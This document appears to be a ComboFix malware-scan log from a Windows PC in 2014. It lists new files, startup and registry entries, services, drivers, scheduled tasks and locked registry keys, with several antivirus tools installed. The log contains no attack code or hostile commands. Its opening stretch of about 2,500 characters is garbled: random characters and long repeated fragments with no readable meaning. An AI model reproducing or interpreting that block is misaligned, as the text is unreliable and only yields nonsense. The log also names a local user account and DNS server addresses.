K~MCqaq?haNHTF~i.A `F"D.0Fgn3^Fi3jcPiwC1:$l"&t.P!FUmy9$pio~IT5SeLxD}#I6KpsI+VFlPVFj1 xAp^I:](45i.\ZjVXYj Hk5js~}i}}HV1dK%$NlT.~#L~/Pqg.1itqp".Me0Nf5jwAp0wb8Vx/e ZF8!"sK s}j!*H#stnm8s]psHjIi*:#3"I[#aC+uH~pis~#^t 1sasK Vm#!Ih V\r8!g5.sak(V9S #N2pqspH 4mHs}7e34A[#aC+uH~pis~i:9G(s0XNwI0#ywr .4Z[qa(j0[tj&tk}i};.ws pV2tlq9g#2wA}iws}!a0IPsKeZt/(sas Ab]F\n .168o\&p^t.ts}:isj8.Z6OjUHbpis~}jjrn#a(I%$m.#}8tVFd&X1oIm#y`hi8c[s0XmZoIj.9oi#};?0F?p#mIft.}jwA}#jY.hX"HUtye.9 :sa5lZsb\x4/P(a9[#aC+_HA5js~iPql?s9O49$4.T}.e.4h83wCI!1~pis~}`}U":l&?`s~j(g&}?OA^U99NbOl1K1;H3slK_V!pf]dr!NA6s^ j#I6IV2alq28}s,U"j85G9a6wHnkDWeTwAp`o5(M,H[TVMI`Fzj#odrisHn." j+g*5iAH5pt;j^bT}f\q_V"Hs~Z}3khPu9q}Z[n}2w+H ..IZ2*K%}.NqAGjy4njsx +U(XN N~}`s$5.T!?At$iZR\Jy92^uwXlqBA\!s~^jY p`s$pioop#.N}9A}P\INTH~pi9qCUYX"f9ZjZY~8s^v6D}H "Il`2j\31x}#VkHUYHVe7NTs5CCj1}VwAps]q13qlJ2N9U!"2?NAAj(~sP9q}P\I.A3!5.sdni.4IwwhjioaIPHM]f9l]rR!N9sGpf5ZPH,%`M1 p`9~}jgsn.ADjV\&I`oAUjqlJfNGKAt3?%$~r3tH}3^qCrR\ro$~I s;ts}253gAp`saJ&"vjjlq[%^yK`B35V1;Hj%W?As$pi}W?it&tFwA}iw9p%37NTtHi.I}(:IDNA} F!82[ `c}+1DmZo3"MItt310KVI/.Va0.3Y;H?R\JTw&pTX0I3s;ty1V5VxAp`2y6ZDZH?RcJTwApZBct2.w}is;I.}*IT(8S"tA}jwA]949j34"}p.+tHY%dF&!pN37[!&h}FAD\T42KA( 9FIH]3I55^w-m+Hg4Tt$J&1c}iwA|"BU}rY~tV5*53A\pZ62Hs~x]f"pH35yj`t;j:NAHUwKIyNhNr1ANTs~t2w;}%\&jT]2+36HjNI/}?O&pNAA (gsP(gq8Txf;0\9!s~HUN"j_IfjpsU4"9\].ws}iws5i(M+3s;}js/tsT!NA5M}&\qCM"!\ow\NGVc5.A&C#5.my3aH"]a}+W7i:\w}jrhhfhappnstvj.uf":129njj&*j&9aiu"wn2s35ka5[!y"+`s%?ub;kit }3w 0yh"]ahot2j.aegm^zn.iu[l^m6jl2c!1yh.$fut}j+mmkqf+1z07|finpk4ahox:rp$w1uawpo}"fx:rasntx9a}jw2}%"a.0^ 9&tdcpa"+uyx3oants~\Mjf]9"5r3]l?Psw}8s2"x9qjjNa[&9*CKAyH!0yH2[xtsoZ}VV5IZ9oli2Ap%3XH:1D\sx:|Ta`j NHn`I+25!?qo7[kR\ fwFPox:lV#*I!Vw}i,DljNFH"sWIus0JF"1}VwApiowpis~}`6/mjwxp`s~}3wA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAn:!bFKD4#^E[9tX8qN&ZI7^9!SrHt8jfs.N!.DJVxF8U"w4 i!? *Zto9-1sgVm }ae jyJ38t^UgW5qaN}Lw_tpIA}q6s}+oZ}i}7^3\F8hg!l 1!j!,a8 Is1kTW}y2TC jX8:j/\"&E}Va/&s}a^UI85q6}mh1Z} 1ZF?SWt+5op/4(pUVZtjY[o?X4.`V![ftXp?X4#i^ENG\Xo?6(#iV!NGHzqq9|jbK !^E[o~!msTa|j3aJ0V;9:OD}Uo0^ZS6HLAy\rSh+G}hdZI7^/3F|wYP+pHZ} !!ixjE[!^Y}jXx4UI^^s,A` jXNsVNt(tEPwX^+4t4wTv}3N^[3I^4V.U5p]^Ih,H]xjEef"w4+X54+V![V.znZ4x5UA8^ jX\y&Et!X/qAHt(M6oC *042N}mh1Npj3kFM93(3zWTBlN!.(pj!dq!x*NV.(p.Z/ Fj98U5yH^T/qF.x8Up.H^!dq#x4Up.\VZw(/44? XZjuIHpU32n?0E?q*y8 DVFZ"hJ/"hSG)/tZhSFPYO5ysT5+4F0PY^nM^!vb*#JIn{l I!UvwQrPb+6,^U\=lE~Z~qbp8mmOm4`+*`N8pm^Wd+cbp/UkpAA==^#~@
.
(((((((((((((((((((((((((   Files Created from 2014-08-13 to 2014-09-13  )))))))))))))))))))))))))))))))
.
.
2014-09-13 23:53 . 2014-09-13 23:53 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-09-13 06:38 . 2014-09-13 06:50 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-09-13 06:34 . 2014-05-12 12:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-09-13 06:34 . 2014-05-12 12:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-09-13 06:34 . 2014-09-13 06:34 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-09-12 23:59 . 2014-06-27 01:45 2285056 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-09-12 23:14 . 2014-09-12 23:14 -------- d-----w- c:\users\Dale\AppData\Local\Microsoft_Corporation
2014-09-12 08:57 . 2014-07-07 01:40 550912 ----a-w- c:\windows\system32\kerberos.dll
2014-09-12 08:57 . 2014-07-07 01:40 1059840 ----a-w- c:\windows\system32\lsasrv.dll
2014-09-12 08:41 . 2014-08-01 11:35 793600 ----a-w- c:\windows\system32\TSWorkspace.dll
2014-09-12 05:48 . 2014-09-05 01:52 445952 ----a-w- c:\windows\system32\aepdu.dll
2014-09-12 05:48 . 2014-09-05 01:47 302592 ----a-w- c:\windows\system32\aeinv.dll
2014-08-28 05:19 . 2014-08-23 00:42 2352640 ----a-w- c:\windows\system32\win32k.sys
2014-08-28 05:19 . 2014-08-23 01:46 305152 ----a-w- c:\windows\system32\gdi32.dll
2014-08-26 23:37 . 2014-08-26 23:37 -------- d-----w- c:\program files\AVG Security Toolbar
2014-08-26 23:37 . 2014-08-26 23:37 -------- d-----w- c:\programdata\Avg_Update_0814tb
2014-08-24 14:47 . 2014-08-24 14:47 -------- d-----w- c:\users\Dale\AppData\Roaming\AVG2014
2014-08-24 14:43 . 2014-08-24 14:43 -------- d-----w- c:\users\Dale\AppData\Roaming\TuneUp Software
2014-08-24 14:39 . 2014-08-24 14:45 -------- d-----w- c:\programdata\AVG2014
2014-08-24 14:36 . 2014-08-25 05:06 -------- d-----w- c:\users\Dale\AppData\Local\Avg2014
2014-08-23 13:14 . 2014-05-14 16:23 45536 ----a-w- c:\windows\system32\wups2.dll
2014-08-23 13:14 . 2014-05-14 16:23 54240 ----a-w- c:\windows\system32\wuauclt.exe
2014-08-23 13:14 . 2014-05-14 16:23 1973728 ----a-w- c:\windows\system32\wuaueng.dll
2014-08-23 13:14 . 2014-05-14 16:17 2425856 ----a-w- c:\windows\system32\wucltux.dll
2014-08-23 13:13 . 2014-05-14 16:23 36320 ----a-w- c:\windows\system32\wups.dll
2014-08-23 13:13 . 2014-05-14 16:23 581600 ----a-w- c:\windows\system32\wuapi.dll
2014-08-23 13:13 . 2014-05-14 16:17 92672 ----a-w- c:\windows\system32\wudriver.dll
2014-08-22 20:38 . 2013-09-20 15:49 18968 ----a-w- c:\windows\system32\sdnclean.exe
2014-08-22 20:38 . 2014-09-13 04:23 -------- d-----w- c:\program files\Spybot - Search & Destroy 2
2014-08-19 06:09 . 2014-05-14 14:23 179656 ----a-w- c:\windows\system32\wuwebv.dll
2014-08-19 06:09 . 2014-05-14 14:17 33792 ----a-w- c:\windows\system32\wuapp.exe
2014-08-16 23:18 . 2014-03-09 21:47 99480 ----a-w- c:\windows\system32\infocardapi.dll
2014-08-16 23:18 . 2014-06-30 22:14 8856 ----a-w- c:\windows\system32\icardres.dll
2014-08-16 23:18 . 2014-03-09 21:47 619672 ----a-w- c:\windows\system32\icardagt.exe
2014-08-16 23:18 . 2014-06-06 06:16 35480 ----a-w- c:\windows\system32\TsWpfWrp.exe
2014-08-16 02:38 . 2014-07-14 01:42 654336 ----a-w- c:\windows\system32\rpcrt4.dll
2014-08-16 02:38 . 2014-06-16 01:44 730048 ----a-w- c:\windows\system32\drivers\dxgkrnl.sys
2014-08-16 02:38 . 2014-06-16 01:44 219072 ----a-w- c:\windows\system32\drivers\dxgmms1.sys
2014-08-16 02:38 . 2014-06-16 01:40 107520 ----a-w- c:\windows\system32\cdd.dll
2014-08-16 02:36 . 2014-07-16 02:46 2048 ----a-w- c:\windows\system32\tzres.dll
2014-08-16 02:36 . 2014-06-03 09:30 101824 ----a-w- c:\windows\system32\consent.exe
2014-08-16 02:36 . 2014-06-03 09:29 2363392 ----a-w- c:\windows\system32\msi.dll
2014-08-16 02:36 . 2014-06-03 09:29 1805824 ----a-w- c:\windows\system32\authui.dll
2014-08-16 02:36 . 2014-06-03 09:29 337408 ----a-w- c:\windows\system32\msihnd.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-08-12 08:03 . 2012-08-29 13:50 42784 ----a-w- c:\windows\system32\drivers\avgtpx86.sys
2014-08-06 15:49 . 2014-08-06 15:49 98584 ----a-w- c:\windows\system32\drivers\avgmfx86.sys
2014-07-25 07:35 . 2014-07-25 07:35 875688 ----a-w- c:\windows\system32\msvcr120_clr0400.dll
2014-07-22 02:03 . 2014-07-22 02:03 200984 ----a-w- c:\windows\system32\drivers\avgidsdriverx.sys
2014-06-30 17:43 . 2014-06-30 17:43 121624 ----a-w- c:\windows\system32\drivers\avgdiskx.sys
2014-06-18 01:51 . 2014-07-09 04:34 646144 ----a-w- c:\windows\system32\osk.exe
2014-06-17 21:22 . 2014-06-17 21:22 188696 ----a-w- c:\windows\system32\drivers\avgldx86.sys
2014-06-17 21:21 . 2014-06-17 21:21 197400 ----a-w- c:\windows\system32\drivers\avgtdix.sys
2014-06-17 21:18 . 2014-06-17 21:18 241944 ----a-w- c:\windows\system32\drivers\avglogx.sys
2014-06-17 21:17 . 2014-06-17 21:17 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys
2014-06-17 21:06 . 2014-06-17 21:06 27416 ----a-w- c:\windows\system32\drivers\avgrkx86.sys
2014-06-17 21:06 . 2014-06-17 21:06 21272 ----a-w- c:\windows\system32\drivers\avgidsshimx.sys
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233}]
2014-08-25 22:35 3627032 ----a-w- c:\program files\AVG Secure Search\18.1.9.799\AVG Secure Search_toolbar.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{95B7759C-8C7F-4BF1-B163-73684A933233}"= "c:\program files\AVG Secure Search\18.1.9.799\AVG Secure Search_toolbar.dll" [2014-08-25 3627032]
.
[HKEY_CLASSES_ROOT\clsid\{95b7759c-8c7f-4bf1-b163-73684a933233}]
[HKEY_CLASSES_ROOT\AVG Secure Search.PugiObj.1]
[HKEY_CLASSES_ROOT\AVG Secure Search.PugiObj]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveBlacklistedOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}]
2014-08-08 15:34 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedEditOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}]
2014-08-08 15:34 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedViewOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}]
2014-08-08 15:34 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSyncedOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40}]
2014-08-08 15:34 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSyncingOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}]
2014-08-08 15:34 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AVG_UI"="c:\program files\AVG\AVG2014\avgui.exe" [2014-08-25 5188112]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^APC UPS Status.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\APC UPS Status.lnk
backup=c:\windows\pss\APC UPS Status.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Audible Download Manager.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Audible Download Manager.lnk
backup=c:\windows\pss\Audible Download Manager.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^QuickBooks Update Agent.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk
backup=c:\windows\pss\QuickBooks Update Agent.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^Users^Dale^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^AOL Desktop.lnk]
path=c:\users\Dale\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AOL Desktop.lnk
backup=c:\windows\pss\AOL Desktop.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]
2012-07-27 20:51 919008 ----a-w- c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Akamai NetSession Interface]
2014-04-18 02:07 4672920 ----a-w- c:\users\Dale\AppData\Local\Akamai\netsession_win.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ApplePhotoStreams]
2013-09-15 19:34 59720 ----a-w- c:\program files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
2013-04-22 02:43 59720 ----a-w- c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AVG_UI]
2014-08-25 16:37 5188112 ----a-w- c:\program files\AVG\AVG2014\avgui.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CanonMyPrinter]
2011-03-15 02:09 2565520 ----a-w- c:\program files\Canon\MyPrinter\BJMYPRT.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CanonSolutionMenuEx]
2011-08-04 19:41 1637496 ----a-w- c:\program files\Canon\Solution Menu EX\CNSEMAIN.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Dell PanelMgr]
2008-06-17 04:04 541936 ----a-w- c:\windows\Dell\PanelMgr\SSMMgr.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Display]
2012-01-24 21:09 284024 ----a-w- c:\program files\APC\PowerChute Personal Edition\DataCollectionLauncher.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\GoogleDriveSync]
2014-08-08 15:34 22734160 ----a-w- c:\program files\Google\Drive\googledrivesync.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\GrooveMonitor]
2009-02-26 23:36 30040 ----a-w- c:\program files\Microsoft Office\Office12\GrooveMonitor.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HostManager]
2008-06-24 18:34 41824 ----a-w- c:\program files\Common Files\AOL\1332695770\ee\aolsoftware.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iCloudServices]
2013-09-14 08:38 59720 ----a-w- c:\program files\Common Files\Apple\Internet Services\iCloudServices.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\IndexSearch]
2008-06-13 17:38 46368 ----a-w- c:\program files\DELL\Dell 2335dn MFP\PaperPort\IndexSearch.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Intuit SyncManager]
2011-06-15 05:32 1532760 ----a-w- c:\program files\Common Files\Intuit\Sync\IntuitSyncManager.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2013-11-02 06:29 152392 ----a-w- c:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PaperPort PTD]
2008-06-13 17:40 29984 ----a-w- c:\program files\DELL\Dell 2335dn MFP\PaperPort\pptd40nt.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2013-05-01 08:59 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SDTray]
2014-06-24 15:42 4101576 ----a-w- c:\program files\Spybot - Search & Destroy 2\SDTray.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Sidebar]
2010-11-20 12:17 1174016 ----a-w- c:\program files\Windows Sidebar\sidebar.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SSBkgdUpdate]
2006-10-25 14:03 210472 ----a-w- c:\program files\Common Files\ScanSoft Shared\SSBkgdUpdate\SSBkgdUpdate.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
2010-02-11 04:32 61440 ----a-w- c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched]
2012-01-18 19:02 254696 ----a-w- c:\program files\Common Files\Java\Java Update\jusched.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\T4S2PC]
2008-09-26 18:54 495616 ----a-r- c:\windows\twain_32\Dell\Dell2335\Scan2Pc.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\vProt]
2014-08-25 22:35 2640408 ----a-w- c:\program files\AVG Secure Search\vprot.exe
.
R2 AVGIDSAgent;AVGIDSAgent;c:\program files\AVG\AVG2014\avgidsagent.exe [2014-08-25 3242000]
R2 SDScannerService;Spybot-S&D 2 Scanner Service;c:\program files\Spybot - Search & Destroy 2\SDFSSvc.exe [2014-06-24 1738168]
R2 SDUpdateService;Spybot-S&D 2 Updating Service;c:\program files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2014-06-27 2088408]
R2 SDWSCService;Spybot-S&D 2 Security Center Service;c:\program files\Spybot - Search & Destroy 2\SDWSCSvc.exe [2014-04-25 171928]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-08-18 108032]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2010-11-20 15872]
R3 Synth3dVsc;Synth3dVsc;c:\windows\system32\drivers\synth3dvsc.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2010-11-20 52224]
R3 tsusbhub;tsusbhub;c:\windows\system32\drivers\tsusbhub.sys [x]
R3 VGPU;VGPU;c:\windows\system32\drivers\rdvgkmd.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2012-03-24 1343400]
S0 AVGIDSHX;AVGIDSHX;c:\windows\system32\DRIVERS\avgidshx.sys [2014-06-17 147736]
S0 Avglogx;AVG Logging Driver;c:\windows\system32\DRIVERS\avglogx.sys [2014-06-17 241944]
S0 Avgrkx86;AVG Anti-Rootkit Driver;c:\windows\system32\DRIVERS\avgrkx86.sys [2014-06-17 27416]
S1 Avgdiskx;AVG Disk Driver;c:\windows\system32\DRIVERS\avgdiskx.sys [2014-06-30 121624]
S1 AVGIDSDriver;AVGIDSDriver;c:\windows\system32\DRIVERS\avgidsdriverx.sys [2014-07-22 200984]
S1 AVGIDSShim;AVGIDSShim;c:\windows\system32\DRIVERS\avgidsshimx.sys [2014-06-17 21272]
S1 Avgldx86;AVG AVI Loader Driver;c:\windows\system32\DRIVERS\avgldx86.sys [2014-06-17 188696]
S1 Avgtdix;AVG TDI Driver;c:\windows\system32\DRIVERS\avgtdix.sys [2014-06-17 197400]
S1 avgtp;avgtp;c:\windows\system32\drivers\avgtpx86.sys [2014-08-12 42784]
S2 APC Data Service;APC Data Service;c:\program files\APC\PowerChute Personal Edition\dataserv.exe [2012-01-24 21880]
S2 avgwd;AVG WatchDog;c:\program files\AVG\AVG2014\avgwdsvc.exe [2014-08-25 289328]
S2 SSPORT;SSPORT;c:\windows\system32\Drivers\SSPORT.sys [2010-06-07 5120]
S2 vToolbarUpdater18.1.9;vToolbarUpdater18.1.9;c:\program files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [2014-08-12 1820184]
S3 VST_DPV;VST_DPV;c:\windows\system32\DRIVERS\VSTDPV3.SYS [2009-07-13 980992]
S3 VSTHWBS2;VSTHWBS2;c:\windows\system32\DRIVERS\VSTBS23.SYS [2009-07-13 266752]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - WS2IFSL
.
Contents of the 'Scheduled Tasks' folder
.
2014-09-13 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-06-22 16:23]
.
2014-09-13 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-06-22 16:23]
.
.
------- Supplementary Scan -------
.
uInternet Settings,ProxyOverride = *.local;<local>
TCP: DhcpNameServer = 208.180.42.68 208.180.42.100
Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - c:\program files\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll
FF - ProfilePath - c:\users\Dale\AppData\Roaming\Mozilla\Firefox\Profiles\pyqw91t4.default\
FF - prefs.js: browser.search.selectedEngine - Conduit Search
FF - prefs.js: browser.startup.homepage - about:home
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Approved Extensions]
@Denied: (2) (LocalSystem)
"{95B7759C-8C7F-4BF1-B163-73684A933233}"=hex:51,66,7a,6c,4c,1d,38,12,f2,76,a4,
   91,4d,c2,9f,0e,ce,75,30,28,4f,cd,76,27
"{D4027C7F-154A-4066-A1AD-4243D8127440}"=hex:51,66,7a,6c,4c,1d,38,12,11,7f,11,
   d0,78,5b,08,05,de,bb,01,03,dd,4c,30,54
"{18DF081C-E8AD-4283-A596-FA578C2EBDC3}"=hex:51,66,7a,6c,4c,1d,38,12,72,0b,cc,
   1c,9f,a6,ed,07,da,80,b9,17,89,70,f9,d7
"{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}"=hex:51,66,7a,6c,4c,1d,38,12,7c,f0,b1,
   38,5c,21,3d,0e,d9,78,0d,25,e1,c9,8c,d4
"{69D72956-317C-44BD-B369-8E44D4EF9801}"=hex:51,66,7a,6c,4c,1d,38,12,38,2a,c4,
   6d,4e,7f,d3,01,cc,7f,cd,04,d1,b1,dc,15
"{72853161-30C5-4D22-B7F9-0BBC1D38A37E}"=hex:51,66,7a,6c,4c,1d,38,12,0f,32,96,
   76,f7,7e,4c,08,c8,ef,48,fc,18,66,e7,6a
"{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}"=hex:51,66,7a,6c,4c,1d,38,12,d5,94,07,
   72,c2,98,42,03,c9,fd,97,9a,f4,87,69,57
"{DBC80044-A445-435B-BC74-9C25C1C588A9}"=hex:51,66,7a,6c,4c,1d,38,12,2a,03,db,
   df,77,ea,35,06,c3,62,df,65,c4,9b,cc,bd
"{2A541AE1-5BF6-4665-A8A3-CFA9672E4291}"=hex:51,66,7a,6c,4c,1d,38,12,8f,19,47,
   2e,c4,15,0b,03,d7,b5,8c,e9,62,70,06,85
"{FF059E31-CC5A-4E2E-BF3B-96E929D65503}"=hex:51,66,7a,6c,4c,1d,38,12,5f,9d,16,
   fb,68,82,40,0b,c0,2d,d5,a9,2c,88,11,17
"{BDEADE7F-C265-11D0-BCED-00A0C90AB50F}"=hex:51,66,7a,6c,4c,1d,38,12,11,dd,f9,
   b9,57,8c,be,54,c3,fb,43,e0,cc,54,f1,1b
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
@Denied: (2) (LocalSystem)
"Timestamp"=hex:a0,4f,61,8e,21,26,cd,01
.
[HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-364017)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_11_9_900_170_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_11_9_900_170_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-09-13  18:58:03
ComboFix-quarantined-files.txt  2014-09-13 23:58
ComboFix2.txt  2014-09-13 16:41
.
Pre-Run: 396,488,941,568 bytes free
